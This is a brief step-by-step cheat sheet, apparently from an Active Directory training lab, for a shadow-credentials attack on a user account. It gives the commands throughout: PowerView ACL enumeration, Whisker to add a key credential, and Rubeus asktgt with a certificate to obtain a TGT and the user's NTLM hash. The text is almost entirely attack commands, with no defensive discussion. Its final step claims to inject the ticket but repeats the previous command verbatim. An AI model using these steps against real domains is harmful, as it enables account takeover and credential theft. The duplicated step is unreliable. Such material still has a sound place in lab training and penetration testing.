Abusing User Object

1. Enumerate the permissions

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"}

2. Add the Shadow Credential

Whisker.exe add /target:supportXuser

3. Using PowerView, see if the Shadow Credential is added.

Get-DomainUser -Identity supportXuser

4. Request the TGT by leveraging the certificate

Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCW.... /password:"1OT0qAom3..." /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /getcredentials /show /nowrap

5. Inject the TGT in the current session or use the NTLM hash

Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCW.... /password:"1OT0qAom3..." /domain:us.techcorp.local /dc:US-DC.us.techcorp.local /getcredentials /show /nowrap